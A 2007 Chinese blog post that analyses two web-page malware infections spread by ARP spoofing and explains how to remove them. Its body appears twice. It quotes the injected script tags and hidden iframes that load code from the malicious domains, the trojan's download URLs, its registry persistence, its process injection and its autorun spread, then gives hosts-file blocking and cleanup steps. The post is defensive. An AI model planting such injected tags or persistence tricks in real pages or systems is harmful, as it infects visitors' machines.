上一篇
下一篇
关于5y5.us与7y7.us这两个网页病毒的处理方法
作者:装饭的桶 日期:2007-05-18
关于7y7.us与ws91.com 进行的APR攻击:
<script src="http://www.7y7.us/oK/Vernum.js"></script>
<script src="http://www.7y7.us/oK/New.js"></script>
C:\WINDOWS\~tmp4704.exe
hTTp://7y7.us/oK/svchost.exe
木马生成到这
C:\program files\internet explorer\plugins\
BinNice.dll
BinNice.bak
1、复制自身到如下路径:
C:\ProgramFiles\InternetExplorer\PLUGINS\BinNice.bak
释放病毒DLL文件到如下路径:
C:\ProgramFiles\InternetExplorer\PLUGINS\BinNice.dll
2、修改注册表,添加如下表项,是病毒每次系统启动时加载自身:
HKCR\CLSID\{06E6B6B6-BE3C-6E23-6C8E-B833E2CE63B8}\(Default)
HKCR\CLSID\{06E6B6B6-BE3C-6E23-6C8E-B833E2CE63B8}\InProcServer32
(Default)="C:\ProgramFiles\InternetExplorer\PLUGINS\BinNice.dll"
HKCR\CLSID\{06E6B6B6-BE3C-6E23-6C8E-B833E2CE63B8}\InProcServer32
"ThreadingModel"="Apartment"
3、安装全局钩子,将病毒dll文件注入系统中存在的进程。
4、当发现注入的进程为explorer.exe或VerCLSID.exe时,连接网络到如下网址下载病毒到本地并运行:
内容来自反病毒
h**p://7y7.us/s**n/csrss.exe
h**p://7y7.us/s**n/svchost32.exe
h**p://7y7.us/s**n/smss.exe
h**p://7y7.us/s**n/services.exe
h**p://7y7.us/s**n/svchost.exe
h**p://7y7.us/s**n/conime.exe
h**p://7y7.us/s**n/ctfmon.exe
h**p://7y7.us/s**n/mmc.exe
h**p://7y7.us/s**n/iexplore.exe
h**p://7y7.us/s**n/srogm.exe
5、向可移动磁盘中复制如下病毒文件,传播自身:
Ghost.pif
autorun.inf
关于5y5.us:
在打开所有网页,都会自动加载以下代码:
<iframe src=http://5y5.us/ width=100 height=0 frameborder=0></iframe>
<iframe src=http://5y5.us/2/002.htm width=0 height=0></iframe> <html>
或http://5y5.us/1/1.jpg 等网址...
处理:
(1)立刻屏蔽那些域名的访问:
立刻关闭IE,然后用记本事打开:
C:\WINDOWS\system32\drivers\etc
下的,HOST文件...
在127.0.0.1 localhost下面,,换行,加上下面的地址:
127.0.0.1 5y5.us
127.0.0.1 www.5y5.us
127.0.0.1 www.7y7.us
127.0.0.1 7y7.us
127.0.0.1 ws91.com
127.0.0.1 www.ws91.com
保存就OK了,,访问那些网址,都会转到127.0.0.1(本机IP)这个IP了..
(2)7y7.us专杀:
下载一个360安全卫士,,地址:http://www.360safe.com/
他们网站有专杀工具...
(3)防范:
使用火狐浏览器.
(4)中毒的主机要想用ARP攻击,就得不断变化自己的MAC地址来截取和发送数据包。
看交换机上哪能个电脑的流量最大,灯狂闪,找到了,就是它
<script src="http://www.7y7.us/oK/Vernum.js"></script>
<script src="http://www.7y7.us/oK/New.js"></script>
C:\WINDOWS\~tmp4704.exe
hTTp://7y7.us/oK/svchost.exe
木马生成到这
C:\program files\internet explorer\plugins\
BinNice.dll
BinNice.bak
1、复制自身到如下路径:
C:\ProgramFiles\InternetExplorer\PLUGINS\BinNice.bak
释放病毒DLL文件到如下路径:
C:\ProgramFiles\InternetExplorer\PLUGINS\BinNice.dll
2、修改注册表,添加如下表项,是病毒每次系统启动时加载自身:
HKCR\CLSID\{06E6B6B6-BE3C-6E23-6C8E-B833E2CE63B8}\(Default)
HKCR\CLSID\{06E6B6B6-BE3C-6E23-6C8E-B833E2CE63B8}\InProcServer32
(Default)="C:\ProgramFiles\InternetExplorer\PLUGINS\BinNice.dll"
HKCR\CLSID\{06E6B6B6-BE3C-6E23-6C8E-B833E2CE63B8}\InProcServer32
"ThreadingModel"="Apartment"
3、安装全局钩子,将病毒dll文件注入系统中存在的进程。
4、当发现注入的进程为explorer.exe或VerCLSID.exe时,连接网络到如下网址下载病毒到本地并运行:
内容来自反病毒
h**p://7y7.us/s**n/csrss.exe
h**p://7y7.us/s**n/svchost32.exe
h**p://7y7.us/s**n/smss.exe
h**p://7y7.us/s**n/services.exe
h**p://7y7.us/s**n/svchost.exe
h**p://7y7.us/s**n/conime.exe
h**p://7y7.us/s**n/ctfmon.exe
h**p://7y7.us/s**n/mmc.exe
h**p://7y7.us/s**n/iexplore.exe
h**p://7y7.us/s**n/srogm.exe
5、向可移动磁盘中复制如下病毒文件,传播自身:
Ghost.pif
autorun.inf
关于5y5.us:
在打开所有网页,都会自动加载以下代码:
<iframe src=http://5y5.us/ width=100 height=0 frameborder=0></iframe>
<iframe src=http://5y5.us/2/002.htm width=0 height=0></iframe> <html>
或http://5y5.us/1/1.jpg 等网址...
处理:
(1)立刻屏蔽那些域名的访问:
立刻关闭IE,然后用记本事打开:
C:\WINDOWS\system32\drivers\etc
下的,HOST文件...
在127.0.0.1 localhost下面,,换行,加上下面的地址:
127.0.0.1 5y5.us
127.0.0.1 www.5y5.us
127.0.0.1 www.7y7.us
127.0.0.1 7y7.us
127.0.0.1 ws91.com
127.0.0.1 www.ws91.com
保存就OK了,,访问那些网址,都会转到127.0.0.1(本机IP)这个IP了..
(2)7y7.us专杀:
下载一个360安全卫士,,地址:http://www.360safe.com/
他们网站有专杀工具...
(3)防范:
使用火狐浏览器.
(4)中毒的主机要想用ARP攻击,就得不断变化自己的MAC地址来截取和发送数据包。
看交换机上哪能个电脑的流量最大,灯狂闪,找到了,就是它
文章来自: 
引用通告: 
Tags: 评论: 0 | 引用: -1 | 查看次数: -
发表评论
----------------------------------------------------------------------
可以的。。
应该是你局域网内一台电脑中毒了。。